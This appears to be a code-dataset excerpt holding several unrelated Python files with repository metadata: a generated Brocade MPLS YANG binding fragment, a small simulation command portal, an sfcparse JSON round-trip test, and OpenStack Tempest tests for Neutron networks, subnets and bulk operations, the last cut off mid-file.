self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
secpath_name = __builtin__.property(_get_secpath_name, _set_secpath_name)
secpath_standby = __builtin__.property(_get_secpath_standby, _set_secpath_standby)
secpath_bfd = __builtin__.property(_get_secpath_bfd, _set_secpath_bfd)
secpath_cspf = __builtin__.property(_get_secpath_cspf, _set_secpath_cspf)
secpath_ipmtu = __builtin__.property(_get_secpath_ipmtu, _set_secpath_ipmtu)
lsp_adaptive = __builtin__.property(_get_lsp_adaptive, _set_lsp_adaptive)
lsp_reoptimize_timer = __builtin__.property(_get_lsp_reoptimize_timer, _set_lsp_reoptimize_timer)
lsp_commit = __builtin__.property(_get_lsp_commit, _set_lsp_commit)
lsp_record = __builtin__.property(_get_lsp_record, _set_lsp_record)
lsp_cos = __builtin__.property(_get_lsp_cos, _set_lsp_cos)
lsp_hop_limit = __builtin__.property(_get_lsp_hop_limit, _set_lsp_hop_limit)
lsp_cspf_computation_mode = __builtin__.property(_get_lsp_cspf_computation_mode, _set_lsp_cspf_computation_mode)
lsp_traffic_engineering = __builtin__.property(_get_lsp_traffic_engineering, _set_lsp_traffic_engineering)
priority = __builtin__.property(_get_priority, _set_priority)
lsp_exclude_any = __builtin__.property(_get_lsp_exclude_any, _set_lsp_exclude_any)
lsp_include_any = __builtin__.property(_get_lsp_include_any, _set_lsp_include_any)
lsp_include_all = __builtin__.property(_get_lsp_include_all, _set_lsp_include_all)
secpath_soft_preemption = __builtin__.property(_get_secpath_soft_preemption, _set_secpath_soft_preemption)
lsp_secpath_auto_bandwidth = __builtin__.property(_get_lsp_secpath_auto_bandwidth, _set_lsp_secpath_auto_bandwidth)
_pyangbind_elements = {'secpath_name': secpath_name, 'secpath_standby': secpath_standby, 'secpath_bfd': secpath_bfd, 'secpath_cspf': secpath_cspf, 'secpath_ipmtu': secpath_ipmtu, 'lsp_adaptive': lsp_adaptive, 'lsp_reoptimize_timer': lsp_reoptimize_timer, 'lsp_commit': lsp_commit, 'lsp_record': lsp_record, 'lsp_cos': lsp_cos, 'lsp_hop_limit': lsp_hop_limit, 'lsp_cspf_computation_mode': lsp_cspf_computation_mode, 'lsp_traffic_engineering': lsp_traffic_engineering, 'priority': priority, 'lsp_exclude_any': lsp_exclude_any, 'lsp_include_any': lsp_include_any, 'lsp_include_all': lsp_include_all, 'secpath_soft_preemption': secpath_soft_preemption, 'lsp_secpath_auto_bandwidth': lsp_secpath_auto_bandwidth, }
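# Usage sketch (illustrative, not part of the generated module): pyangbind
# exposes each leaf through the properties registered above, and the
# generated _set_* methods wrap values in YANGDynClass, raising ValueError
# for anything outside the YANG restrictions. The class name `secpath` below
# is an assumption for illustration.
#
# sp = secpath()
# sp.secpath_ipmtu = 1500        # accepted: inside the 576..1526 range
# try:
#     sp.secpath_ipmtu = 9000    # rejected: outside the restriction range
# except ValueError as err:
#     print(err.args[0]['error-string'])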
| true | true |
1c446db459b8ff21bcf05a909d7da4d5e1444764 | 2,724 | py | Python | panzoto/portal.py | yangliu2/panzoto | 86fb0e6ab26a682b360dd45394f894fa03b5d433 | ["MIT"] | null | null | null | panzoto/portal.py | yangliu2/panzoto | 86fb0e6ab26a682b360dd45394f894fa03b5d433 | ["MIT"] | null | null | null | panzoto/portal.py | yangliu2/panzoto | 86fb0e6ab26a682b360dd45394f894fa03b5d433 | ["MIT"] | null | null | null |
from pathlib import Path
import pickle
from rich.table import Table
from rich import box
from rich.console import Console
from typing import Callable, Dict
import panzoto.config as CFG
from panzoto.matrix import Matrix
from panzoto.utils import load_matrix, log_output, timer
class Portal():
def __init__(self):
# load Matrix
if Path(CFG.default_matrix).exists():
self.matrix = load_matrix()
else:
self.matrix = Matrix()
# load commands
self.commands = self.load_commands()
@timer
def save_matrix(self,
save_path: str = CFG.default_matrix) -> None:
"""Save the world data in a pickle file
Args:
save_path (str, optional): save matrix file path.
Defaults to CFG.default_matrix.
"""
file_path = Path(save_path)
if not file_path.parent.exists():
Path(file_path.parent).mkdir(parents=True, exist_ok=True)
with open(file_path, 'wb') as handle:
pickle.dump(self.matrix,
handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_commands(self) -> Dict[str, Callable]:
"""Lists of commands
Returns:
Dict: dict of commands, {command: function to call}
"""
commands = {
# create_person <first name> <last name>
'create_person': self.matrix.create_person,
'create_people': self.matrix.create_people,
'create_child': self.matrix.create_child,
'remove_person': self.matrix.delete_person,
'list_people': self.matrix.list_people,
'create_food': self.matrix.create_food,
'remove_item': self.matrix.delete_thing,
'assign': self.matrix.assign_item,
'list_items': self.matrix.list_things,
'run_turns': self.matrix.run_n_turn,
'focus': self.matrix.focus,
'show_stats': self.matrix.show_stats,
'show_records': self.matrix.show_records,
'graph_stats': self.matrix.graph_stats,
'help': self.show_commands
}
return commands
def show_commands(self) -> str:
"""Display a list of commands
Returns:
str: output string
"""
output = ""
commands = self.load_commands()
table = Table(title="Matrix Commands", box=box.ROUNDED)
table.add_column("Commands",
justify="left",
style="cyan")
for key in commands:
table.add_row(key)
console = Console()
console.print(table)
return output
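# Usage sketch (illustrative, not part of portal.py): every command resolves
# to a bound method on the Matrix or the Portal, so a REPL loop can dispatch
# by name.
# portal = Portal()
# portal.commands['help']()    # renders the command table via rich
# portal.save_matrix()         # pickles the matrix to CFG.default_matrix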
| 30.954545 | 69 | 0.579295 |
| true | true |
1c446e092f59a795f8241b05d24a122a84ab3529 | 100 | py | Python | app/domain/exceptions.py | globocom/enforcement | 004ff545d6d61b95b555d9981525510496862b3e | ["BSD-3-Clause"] | 7 | 2020-11-08T18:02:26.000Z | 2021-10-15T21:40:35.000Z | app/domain/exceptions.py | globocom/enforcement | 004ff545d6d61b95b555d9981525510496862b3e | ["BSD-3-Clause"] | 19 | 2020-11-19T20:57:20.000Z | 2021-09-03T14:53:34.000Z | app/domain/exceptions.py | globocom/enforcement-service | 004ff545d6d61b95b555d9981525510496862b3e | ["BSD-3-Clause"] | 3 | 2020-10-03T02:40:34.000Z | 2020-10-19T10:17:06.000Z |
class EnforcementInvalidException(Exception):
pass
class SecretNotFound(Exception):
pass
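# Usage sketch (illustrative): the domain layer raises these for callers to
# translate into error responses, e.g.
# raise SecretNotFound('secret "db-password" is not registered')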
| 12.5 | 45 | 0.77 |
| true | true |
1c446e1ef19c9f608c436ef3bdb84329213f98ad | 1,496 | py | Python | tests/json/test_jsonexportfile.py | aaronater10/sfconfig | f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a | ["MIT"] | null | null | null | tests/json/test_jsonexportfile.py | aaronater10/sfconfig | f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a | ["MIT"] | null | null | null | tests/json/test_jsonexportfile.py | aaronater10/sfconfig | f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a | ["MIT"] | null | null | null |
# jsonexportfile - Tests
from src import sfcparse
from os import remove, path
import time
test_file_path = './tests/test_files/json/'
file_delay_timer = 0.5
################################################################
# TESTS
# 1. JSON Data Export - Exporting json file data and test attributes
def test1_json_file_export():
filename = '1_export_data.json'
filepath = test_file_path + filename
json_data = {
'string_data': 'data',
'int_data': 256,
'array_data': [1,2,3],
'bool_data': True,
'null_data': None
}
# Remove Any Existing Test File
try: remove(filepath)
except: pass
time.sleep(file_delay_timer)
# Test Not Exist, Create, Exist, test data and its Type
assert not path.exists(filepath)
sfcparse.jsonexportfile(filepath, json_data)
assert path.exists(filepath)
json_import = sfcparse.jsonimportfile(filepath)
assert (json_import['string_data'] == 'data') and (isinstance(json_import['string_data'], str))
assert (json_import['int_data'] == 256) and (isinstance(json_import['int_data'], int))
assert (json_import['array_data'] == [1,2,3]) and (isinstance(json_import['array_data'], list))
assert (json_import['bool_data'] == True) and (isinstance(json_import['bool_data'], bool))
assert (json_import['null_data'] == None) and (isinstance(json_import['null_data'], type(None)))
# Remove Test File
time.sleep(file_delay_timer)
try: remove(filepath)
except: pass
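# Round-trip sketch (illustrative, mirrors the test above):
# sfcparse.jsonexportfile('out.json', {'key': 'value'})
# data = sfcparse.jsonimportfile('out.json')
# assert data['key'] == 'value'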
| 32.521739 | 100 | 0.661096 |
| true | true |
1c446eff4ecb46549266af14ca2384810a90480b | 29,182 | py | Python | tempest/api/network/test_networks.py | xavpaice/tempest | 958bd694df27511e0346d799876fe49331b8145c | ["Apache-2.0"] | null | null | null | tempest/api/network/test_networks.py | xavpaice/tempest | 958bd694df27511e0346d799876fe49331b8145c | ["Apache-2.0"] | null | null | null | tempest/api/network/test_networks.py | xavpaice/tempest | 958bd694df27511e0346d799876fe49331b8145c | ["Apache-2.0"] | null | null | null |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest.common import custom_matchers
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTest(base.BaseNetworkTest):
"""Tests the following operations in the Neutron API:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of CIDRs from which smaller blocks
can be allocated for tenant IPv4 subnets
tenant_network_v6_cidr is the equivalent for IPv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for IPv6 subnets
"""
@classmethod
def resource_setup(cls):
super(NetworksTest, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
# Derive last subnet CIDR block from tenant CIDR and
# create the subnet with that derived CIDR
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
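# Example: with a derived gateway of 10.100.0.1, the pool above evaluates to
# [{'start': '10.100.0.3', 'end': '10.100.0.4'}] (gateway + 2 .. gateway + 3).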
def subnet_dict(self, include_keys):
# Return a subnet dict which has include_keys and their corresponding
# value from self._subnet_data
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.networks_client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.networks_client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
# Create a network
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
# Verify network update
new_name = "New_network"
body = self.networks_client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Verify subnet update
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.networks_client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name']:
self.assertEqual(network[key], self.network[key])
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name']
body = self.networks_client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.networks_client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name']
body = self.networks_client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.subnets_client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.subnets_client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.subnets_client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.subnets_client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.networks_client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
# Creates a network
name = data_utils.rand_name('network-')
body = self.networks_client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Delete network while the subnet still exists
body = self.networks_client.delete_network(net_id)
# Verify that the subnet got automatically deleted.
self.assertRaises(lib_exc.NotFound, self.subnets_client.show_subnet,
subnet_id)
# Since create_subnet adds the subnet to the delete list, and it is
# actually deleted here, this would cause an issue during cleanup; hence
# remove it from the list.
self.subnets.pop()
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
# Verify subnet update
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.networks_client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets']
for network in body['networks']
if not network['shared'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
"""Tests the following operations in the Neutron API:
bulk network creation
bulk subnet creation
bulk port creation
list tenant's networks
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant networks
    tenant_network_mask_bits with the mask bits to be used to partition the
    block defined by tenant_network_cidr
"""
def _delete_networks(self, created_networks):
for n in created_networks:
self.networks_client.delete_network(n['id'])
# Asserting that the networks are not found in the list after deletion
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.subnets_client.delete_subnet(n['id'])
# Asserting that the subnets are not found in the list after deletion
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.ports_client.delete_port(n['id'])
# Asserting that the ports are not found in the list after deletion
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
# Creates 2 networks in one request
network_list = [{'name': data_utils.rand_name('network-')},
{'name': data_utils.rand_name('network-')}]
body = self.client.create_bulk_network(networks=network_list)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
# Asserting that the networks are found in the list after creation
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 subnets in one request
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets=subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
# Asserting that the subnets are found in the list after creation
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 ports in one request
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(ports=port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
# Asserting that the ports are found in the list after creation
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTest):
_ip_version = 6
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway)
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
# Verifies Subnet GW is set in IPv6
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
# Verifies Subnet GW is None in IPv4
self.assertEqual(subnet2['gateway_ip'], None)
        # Verifies that both subnets are in the same network
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
        self.assertItemsEqual(subnets,
                              test_subnet_ids,
                              'Subnets are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def skip_checks(cls):
super(NetworksIpV6TestAttrs, cls).skip_checks()
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
"""Create subnet and delete it with existing ports"""
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.subnets_client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.subnets_client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.networks_client.delete_network,
slaac_network['id'])
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
"""Test deleting subnet with SLAAC ports
Create subnet with SLAAC, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("slaac")
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
